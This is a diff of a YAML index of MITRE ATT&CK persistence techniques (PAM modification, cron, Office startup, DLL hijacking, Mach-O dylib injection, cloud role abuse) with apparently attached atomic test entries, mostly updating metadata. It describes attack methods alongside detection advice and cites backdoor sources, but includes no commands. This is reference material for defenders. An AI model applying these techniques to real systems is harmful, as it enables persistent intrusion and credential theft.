-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -33173,20 +33525,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests:
     - name: Malicious PAM rule
@@ -33398,7 +33787,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -33486,7 +33874,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -33571,11 +33958,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -33653,7 +34039,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -33686,7 +34071,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -33709,11 +34094,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -33771,9 +34155,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -33854,12 +34237,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -33878,7 +34260,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -33892,7 +34273,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -33919,8 +34299,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -33951,7 +34331,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -34008,11 +34389,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -34084,9 +34464,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -34102,12 +34482,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -34182,7 +34561,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -34225,7 +34603,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -34249,8 +34627,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -34405,31 +34781,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -34446,6 +34802,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -34456,9 +34813,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -34466,8 +34827,24 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests:
     - name: Cron - Replace crontab with referenced file
@@ -34586,11 +34963,15 @@ persistence:
           '
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -34598,79 +34979,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -34700,6 +35075,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -34710,6 +35086,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -34718,13 +35095,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -34766,9 +35143,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -34836,19 +35210,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
